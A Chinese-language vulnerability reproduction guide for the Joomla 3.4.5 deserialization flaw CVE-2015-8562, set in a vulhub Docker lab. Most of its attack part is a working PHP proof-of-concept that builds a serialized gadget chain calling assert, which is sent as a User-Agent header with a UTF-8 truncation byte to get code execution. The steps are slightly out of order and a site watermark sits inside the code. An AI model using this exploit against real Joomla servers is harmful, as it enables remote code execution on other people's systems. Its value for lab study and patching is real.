Joomla3.4.5反序列化漏洞(CVE-2015-8562)
简介
本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前⼀段数据⽽去反序列化下⼀段数据。⽽Joomla将session存储在Mysql数据库中,编码是utf8,当我们插⼊4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。
影响版本
Joomla 1.5.x, 2.x, and 3.x before 3.4.6
PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45
环境搭建
使⽤vulhub和docker来搭建环境
cd /root/vulhub/joomla/CVE-2015-8562
Docker-compose up -d
数据库地址:mysql:3306
⽤户:root
密码:root
数据库名:joomla
漏洞复现
⽤这个⽹站⽣成POC
<?phpclass JSimplepieFactory {
}class JDatabaseDriverMysql {
}class SimplePie {
var $sanitize;
var $cache;
var $cache_name_function;
var $javascript;
var $feed_url;
function __construct()
{
cve漏洞库
$this->feed_url = "phpinfo();JFactory::getConfig();exit;";        $this->javascript = 9999;
$this->cache_name_function = "assert";
$this->sanitize = new JDatabaseDriverMysql();
$this->cache = true;
}
}
class JDatabaseDriverMysqli {
protected $a;
protected $disconnectHandlers;
protected $connection;
function __construct()
{
$this->a = new JSimplepieFactory();
$x = new SimplePie();
$this->connection = 1;
$this->disconnectHandlers = [
[$x, "init"],
];
}
}
$a = new JDatabaseDriverMysqli();$poc = serialize($a); $poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);
echo "123}__test|{$poc}\xF0\x9D\x8C\x86";
将⽣成好的POC作为User-Agent,带上第⼀步获取的Cookie发包,这⼀次发包,脏数据进⼊Mysql数据库。然后同样的包再发⼀次,我们的代码被执⾏:
我们先不带UA头,构造数据包如下,得到服务器返回的cookie。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。